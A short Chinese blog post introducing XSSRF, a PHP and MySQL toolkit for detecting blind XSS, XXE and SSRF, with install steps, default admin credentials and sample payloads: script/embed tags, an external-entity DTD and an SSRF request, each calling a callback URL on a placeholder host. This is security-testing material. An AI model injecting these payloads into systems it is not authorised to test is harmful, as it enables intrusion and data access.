小林博客XSSRF是一个用于检测和跟踪Blind XSS,XXE和SSRF的工具包,基于php+mysql的WEB端程序,它拥有简洁漂亮的界面。
XSSRF安装
下载源码
|
1
|
git clone https://github.com/SpiderMate/B-XSSRF.git
|
- 将文件上传到您的服务器。
- 创建一个数据库并将database.sql导入。
- 更改db.php文件中的DB信息。
- 准备好了。
XSSRF使用
BLIND XSS
|
1
2
|
<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">
|
BLIND XXE
|
1
2
3
4
5
|
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
|
SSRF
|
1
|
GET /testssrf.php=http://mysite.com/bxssrf/request.php
|
默认帐户
|
1
2
|
USER : admin@test.com
PASS : 123456
|
